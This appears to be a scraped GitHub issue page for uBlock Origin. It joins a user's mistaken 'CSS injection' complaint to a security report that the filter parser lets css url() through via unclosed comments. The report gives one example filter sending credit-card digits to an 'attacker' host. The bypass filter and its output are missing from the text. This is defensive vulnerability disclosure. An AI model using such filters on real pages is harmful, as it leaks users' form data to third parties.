Closed taviso closed 3 years ago
I am using UBlock Origin in firefox and experienced an HTML/CSS Injection.
I checked my clipboard history to confirm that the injection must have happened inside the browser.
This is the full injected code. https://zerobin.net/?4ea4f656641e00a9#dvOszgwDNnt2qCQwyLH/x4hYfgpzsn2KUiqnI9hnTMs=
The injected css class is named .sharebtn
The code was not running since it was just in the css tag but the links are very shady.
Here are some snippets to make it indexable by search-engines
[href^=""], iframe[src^="https://isupportjournalism.com/"][style], CLOUDFLARE-APP[app-id="no-adblock"], div[style*="box-shadow: rgb(136, 136, 136) 0px 0px 12px; color: "], img[width="320"][height="50"], iframe[width="320"][height="50"], amp-auto-ads,
I am using Firefox. This is the list of active filters. My custom filters are not problematic.
Please fix this.
@joseftogo These are user CSS styles, that's how cosmetic filtering works. If you don't want cosmetic filtering, you can disable it.
Prerequisites
I tried to reproduce the issue when...
Description
If I understand the filter security model correctly, third party filter lists are trusted to hide content, but are not permitted to modify or read page content. For this reason, the css
url()
function is not permitted in any:style()
rules, because that could be used to modify and/or exfiltrate content.I guess the obvious way to exfiltrate content would be to auto-generate a ton of
input.creditcard:has-text(/^0/):style(background-image: url(http://attacker/?matched=0)
filters, but I guess you already realized this and that's why you banurl()
😃Anyway, I think I've found a way to get a
url()
past the parser, it doesn't check if comments are closed in variables, so this filter:Generates this CSS:
A specific URL where the issue occurs
https://www.example.com/
Steps to Reproduce
Visit this link, observe that there is an image background. I think this should be impossible.
Expected behavior
The css
url()
function is correctly banned.Actual behavior
The parser is confused by unclosed comments.
uBlock Origin version
1.37.2
Browser name and version
Chrome 92
Operating System and version
Fedora 34